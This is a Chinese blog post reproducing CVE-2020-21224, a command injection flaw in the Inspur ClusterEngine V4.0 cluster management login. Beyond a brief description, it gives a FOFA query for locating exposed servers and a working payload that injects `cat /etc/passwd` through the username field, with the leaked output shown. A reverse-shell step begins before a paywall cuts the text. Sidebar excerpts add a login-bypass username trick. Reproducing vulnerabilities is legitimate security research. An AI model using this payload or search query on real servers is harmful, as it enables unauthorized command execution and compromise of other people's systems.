浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224

最新推荐文章于 2025-01-16 21:00:22 发布
最新推荐文章于 2025-01-16 21:00:22 发布
阅读量1.6k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiTaiShen/article/details/125989764
本文介绍了浪潮ClusterEngineV4.0存在的远程命令执行漏洞CVE-2020-21224,详细阐述了漏洞简介、影响范围,并提供了FOFA语法和漏洞复现的步骤,旨在学习研究,提醒注意合法使用。

浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224

此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。

漏洞简介

浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行

漏洞影响

浪潮ClusterEngineV4.0

FOFA语法

title="TSCEV4.0"

漏洞复现

登录页面如下

img

POC

POC测试(出现 root:x:0:0 则存在漏洞)
op=login&username=test`$(cat /etc/passwd)`

{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user test does not exist\nerror:1\n"}

反弹shell
op=login&username=te
了解本专栏 订阅专栏 解锁全文 超级会员免费看
浪潮ClusterEngineV4.0 sysShell 远程命令执行
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
05-28 412
既然已经决定做一件事,那么除了当初决定做这件事的我之外,没人可以叫我傻瓜。
浪潮ClusterEngineV4.0 任意用户登录
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
05-27 358
所谓理想,只是同时拥有实力的人才能说的“现实”。所谓弱就是一种罪。
insuperRCE:浪潮ClusterEngineV4.0 前台getshell
04-16
insuperRCE 浪潮ClusterEngineV4.0 前台getshell
CVE-2020-21224浪潮ClusterEngineV4.0 远程命令执行漏洞复现
ximo的博客
04-14 4122
简介 浪潮 Inspur ClusterEngine是中国浪潮公司的一个应用软件。提供管理集群系统中软硬件提交的作业。 漏洞描述 浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行 影响版本 浪潮ClusterEngineV4.0 FOFA title="TSCEV4.0" 复现过程 FOFA搜索: 登录页面: 输入账号密码,进行抓包: 页面不存在验证码,且存在用户名枚举,进行暴力破解: 通过fuzz,发现在用户名或密码任意一处添加 ’ ,会报错: 正常输入: 添加单引号: 添加分号,
浪潮ClusterEngineV4.0 任意用户登录漏洞
qq_17754023的博客
02-28 1542
1.漏洞描述 浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限。 2.资产查找 FOFA:title="TSCEV4.0" 3.漏洞复现 1)进入登录页面 2)输入用户名和密码如下,即可进入后台 USER: admin|pwd PASS: 任意 点击登陆 ...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)
m0_68045701的博客
07-10 2768
2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如。访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
浪潮 ClusterEngineV4.0 任意命令执行
xxx9686的博客
09-20 761
浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件,该软件采用B/S架构,通过浏览器(IE,firefox等)进行操作,可以管理集群系统中的软硬件资源和用户提交的作业,根据集群中的资源使用情况来合理的调度用户提交的作业,从而达到提高资源的利用率和作业的执行效率的作用。其4.0版本存在任意命令执行漏洞。攻击者通过发送精心构造的请求包到目标应用程序,将会造成远程命令执行漏洞。甚至获得目标站点的服务器权限。
浪潮 ClusterEngineV4.0 任意用户登录+命令执行
StriveBen的博客
04-12 3200
概述 浪潮clusterengine v4.0 集群管理平台,可管理集群系统中的软硬件资源和用户提交的作业,根据集群中的资源使用情况来合理的调度用户提交的作业,从而达到提高资源的利用率和作业的执行效率的作用。 在网络空间测绘搜索引擎中搜索关键字: title="TSCEV4.0"或者"clusterengine v4.0"收集相关资产。 任意用户登录 指定登录过程中的username字段值为"any|pwd"形式即可登录系统: POST /login HTTP/1.1 Host: xxx Co
漏洞复现-浪潮-GS企业管理软件-RCE
无问社区的博客
08-28 2388
浪潮GS是浪潮研发的系统软件,浪潮GS,采用SOA 架构和先进开放的GSP 应用中间件开发,面向大中型集团企业提供的一套数据集中、应用集中、管理集中的全面解决方案。浪潮GS企业管理软件存在RCE(Remote Code Execution,远程代码执行)漏洞是指攻击者能够在远程服务器上执行任意代码的安全漏洞。此类漏洞通常会让攻击者完全控制受影响的系统,导致严重的安全问题。
浪潮GS企业管理软件GetChildFormAndEntityList存在反序列化漏洞
xiaokp7的博客
07-24 1323
浪潮GS 面向大中型集团企业采用SOA 架构和先进开放的GSP 应用中间件开发,形成了集团管控13 大领域15 大行业60余个细分行业的解决方案。在管理方面,浪潮GS 有效帮助企业有效实现财务集中管理、资金集中管理、资产集中管理、供应链集中管理,从而达到集团信息的集中监控以及企业集团成员之间资源共享、合作共赢、共同发展。在业务方面,浪潮GS 支持供应链协同、生产管理协同,打破企业资源(人、财、物、信息、流程等)之间的各种壁垒和边界,帮助企业实现内外供应链的全面管理,从而提高了整个产业链对客户的反应速度。
浪潮云财务系统xtdysrv.asmx存在命令执行漏洞
最新发布
西米安全
01-16 1087
浪潮云财务系统xtdysrv.asmx存在命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞服务器端任意执行代码。
浪潮ClusterEngineV4.0 远程命令执行
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
05-29 312
胜利和败北都要品尝,经历过四处流浪的辛酸,痛苦和悲伤的回忆,这样才能独当一面,就算痛哭流涕也没关系!
浪潮远控卡的登录爆破漏洞
weixin_30326515的博客
01-26 1030
一、浪潮远控卡简介 浪潮远控卡是一款插在服务器上的,方便运维人员和服务器管理人员对服务器进行远程控制的WEB服务,其在80端口对外提供HTTP服务。登录进去以后可以对服务器硬件进行远程控制和管理。例如CPU、内存等性能指标监控,远程开启关闭服务器上的虚拟机,甚至作为控制虚拟主机的跳板机。 二、浪潮远控卡的漏洞浪潮远控卡可以尝试使用admin/admin进行登录尝试,很有可能可以进...
SMBv3远程代码执行漏洞CVE-2020-0796防护指南
CVE-2020-0796,也被称为“永恒之黑”或“SMBGhost”,是一个存在于Windows SMBv3服务器和客户端实现中的远程代码执行漏洞。SMB(Server Message Block)是一种协议,用于在Windows网络中实现文件和打印服务的共享。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

初岄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值